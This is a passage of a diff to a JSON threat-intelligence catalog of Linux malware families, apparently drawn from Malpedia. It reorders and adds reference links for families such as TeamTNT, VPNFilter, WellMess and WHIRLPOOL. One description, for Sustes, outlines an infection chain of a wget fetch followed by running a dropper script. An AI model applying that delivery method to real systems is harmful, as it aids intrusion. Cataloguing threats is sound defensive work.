"https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/", - "https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/", + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/", + "https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/", + "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/", + "https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/" ], "synonyms": [], "type": [] @@ -6614,10 +6920,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi", - "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", - "https://www.mandiant.com/resources/unc2891-overview", "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/", - "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/" + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", + "https://www.mandiant.com/resources/unc2891-overview" ], "synonyms": [], "type": [] @@ -6639,7 +6945,7 @@ "value": "Sunless" }, { - "description": "Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", + "description": "Sustes Malware doesn\u2019t infect victims by itself (it\u2019s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes", @@ -6671,7 +6977,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sword2033", - "https://unit42.paloaltonetworks.com/alloy-taurus/" + "https://unit42.paloaltonetworks.com/alloy-taurus/", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/" ], "synonyms": [], "type": [] @@ -6684,9 +6991,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.symbiote", + "https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html", "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", - "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/", "https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat", + "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/", "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote" ], "synonyms": [], @@ -6715,10 +7023,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysrvhello", - "https://www.lacework.com/sysrv-hello-expands-infrastructure/", + "https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://www.riskiq.com/blog/external-threat-management/sysrv-hello-cryptojacking-botnet/", - "https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet" + "https://www.lacework.com/sysrv-hello-expands-infrastructure/" ], "synonyms": [ "Sysrv" @@ -6733,28 +7041,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", - "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf", - "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/", - "https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/", - "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", - "https://sysdig.com/blog/teamtnt-aws-credentials/", - "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked", - "https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools", - "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://tolisec.com/active-crypto-mining-operation-by-teamtnt/", - "https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html", - "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/", + "https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools", "https://unit42.paloaltonetworks.com/atoms/adept-libra/", - "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials", - "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server", - "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", - "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/", - "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/", - "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool", - "https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html", "https://unit42.paloaltonetworks.com/atoms/thieflibra/", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", + "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", + "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/", + "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera", + "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials", + "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/", + "https://sysdig.com/blog/teamtnt-aws-credentials/", + "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool", + "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/", + "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/", + "https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html", + "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked", + "https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html", + "https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/", + "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf" ], "synonyms": [], "type": [] @@ -6767,8 +7076,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon", - "https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers", - "https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902" + "https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902", + "https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers" ], "synonyms": [], "type": [] @@ -6781,8 +7090,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tntbotinger", - "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html", - "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/" + "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/", + "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" ], "synonyms": [], "type": [] @@ -6821,18 +7130,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie", - "https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf", - "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://twitter.com/ESETresearch/status/1382054011264700416", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf", - "https://twitter.com/ESETresearch/status/1382054011264700416", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html" ], "synonyms": [], "type": [] @@ -6858,28 +7167,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", + "https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers", + "https://sysdig.com/blog/muhstik-malware-botnet-analysis/", + "http://get.cyberx-labs.com/radiation-report", "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", - "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/", + "https://asec.ahnlab.com/en/54647/", + "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/", - "https://blog.aquasec.com/fileless-malware-container-security", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", - "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039", - "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134", - "https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt", - "https://sysdig.com/blog/muhstik-malware-botnet-analysis/", - "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", - "http://get.cyberx-labs.com/radiation-report", - "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/", + "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/", "https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server", - "https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", - "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", + "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134", + "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/", + "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", "https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/", - "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/" + "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/", + "https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt", + "https://blog.aquasec.com/fileless-malware-container-security", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/" ], "synonyms": [ "Amnesia", @@ -6896,7 +7206,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat", - "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html" + "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html", + "https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html" ], "synonyms": [], "type": [] @@ -6951,8 +7262,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_005", - "https://ti.qianxin.com/blog/articles/SideCopy's-Golang-based-Linux-tool/", - "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/" + "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/", + "https://ti.qianxin.com/blog/articles/SideCopy's-Golang-based-Linux-tool/" ], "synonyms": [], "type": [] @@ -6992,9 +7303,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike", + "https://notes.netbytesec.com/2021/09/discovering-linux-elf-beacon-of-cobalt_18.html", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/", - "https://notes.netbytesec.com/2021/09/discovering-linux-elf-beacon-of-cobalt_18.html" + "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" ], "synonyms": [], "type": [] @@ -7007,31 +7318,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", - "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html", - "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", - "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", - "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html", - "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", - "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", "https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html", - "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a", - "https://blog.talosintelligence.com/2018/05/VPNFilter.html", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf", + "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware", + "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter", + "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", + "https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf", + "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", + "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/", + "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", + "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/", "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter", - "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf", + "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", + "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a", "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/" + "https://blog.talosintelligence.com/2018/05/VPNFilter.html" ], "synonyms": [], "type": [] @@ -7057,14 +7368,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", - "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html" ], "synonyms": [], "type": [] @@ -7077,24 +7388,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", "https://community.riskiq.com/article/541a465f/description", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa21-116a", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", - "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf", - "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", - "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", - "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29", - "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html" ], "synonyms": [], "type": [] @@ -7102,13 +7413,26 @@ "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", "value": "elf.wellmess" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.whirlpool", + "https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0" + ], + "synonyms": [], + "type": [] + }, + "uuid": "be3a5211-45a8-496a-974f-6ef14f44af3d", + "value": "WHIRLPOOL" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.whiterabbit", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Ransom.Win32.WHITERABBIT.YACAET" + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Ransom.Win32.WHITERABBIT.YACAET", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/" ], "synonyms": [], "type": [] @@ -7121,11 +7445,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://attack.mitre.org/groups/G0096", - "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a", "https://blog.exatrack.com/melofee/", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas" + "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a", + "https://asec.ahnlab.com/en/55785/", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [], "type": [] @@ -7138,8 +7464,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", - "https://news.drweb.com/show/?i=2679&lng=en&c=14", - "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html" + "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] @@ -7152,14 +7478,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", - "https://www.secureworks.com/research/threat-profiles/iron-twilight" + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "synonyms": [ "chopstick", @@ -7177,8 +7503,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe", "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/", - "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", - "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html" + "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html", + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775" ], "synonyms": [], "type": [] @@ -7204,8 +7530,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash", - "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/", - "https://unit42.paloaltonetworks.com/atoms/agedlibra/" + "https://unit42.paloaltonetworks.com/atoms/agedlibra/", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" ], "synonyms": [], "type": [] @@ -7231,23 +7557,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", - "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", - "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/", - "https://en.wikipedia.org/wiki/Xor_DDoS", - "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", - "https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf", - "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", - "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/", - "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/", - "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/", - "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/", - 